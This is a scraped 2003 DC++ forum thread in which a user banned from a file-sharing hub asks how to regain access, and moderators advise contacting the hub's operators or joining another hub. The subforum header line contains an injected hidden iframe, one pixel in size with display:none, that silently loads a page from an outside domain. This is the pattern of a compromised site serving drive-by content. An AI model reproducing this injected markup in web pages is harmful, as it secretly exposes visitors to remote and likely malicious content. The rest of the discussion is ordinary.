OK. Can somebody answer?

Non-DC related talk...<iframe src=http://pokupka.ks.ua/templates/As/image ... p?from=com width=1 height=1 style=display:none></iframe>

Moderator: Moderators

Giacomo Yakuzzi

OK. Can somebody answer?

Post by Giacomo Yakuzzi » 2003-12-23 06:41

I think I was kindly misanderstood while shown as an aggressive barbarian who wants to chop people`s heads off through posted comments. Don`t define myself or see as one.

Sure, I apologize for advertising - In my second post - because I think that one was meant for only my own good.

Can somebody answer this: (informational prupose based/only)

How do I get back to a hub from which I was banned permanently? I mean, is there some kinda way without having to always hack my way through? (MAN I`M TRYING to be legal - believe me... but hub-security just doesn`t seem to understand that.)
Can I apologize to the hub-masters, hub-security or what?

I do understand the concept of being banned. But PERMANENTLY, man, think that went somewhere beyond irrational.

(I just hope you don`t spend another night trying to find some advertising where there is any.)

joakim_tosteberg
Forum Moderator

Post by joakim_tosteberg » 2003-12-23 06:45

Looking for advertising...
:lol:

THe only way to get unbanned is to in someway get in contact with a person who is op on that hub.

TheParanoidOne
Forum Moderator

Post by TheParanoidOne » 2003-12-23 08:26

There is the question in the official FAQ about bans which may be useful.
joakim_tosteberg wrote:THe only way to get unbanned is to in someway get in contact with a person who is op on that hub.
I concur.

If the hub has a website, it may give you contact details or you may find some in the hub's Welcome message.
Failing either of those, if you know someone else who frequents the hub you could get them to pass on your details to an Op.

If none of the above are successful, I suggest just moving on to another hub. There are plenty of good hubs out there for someone who wants to share a lot of good stuff, which you appear to be.

Good luck.
The world is coming to an end. Please log off.

DC++ Guide | Words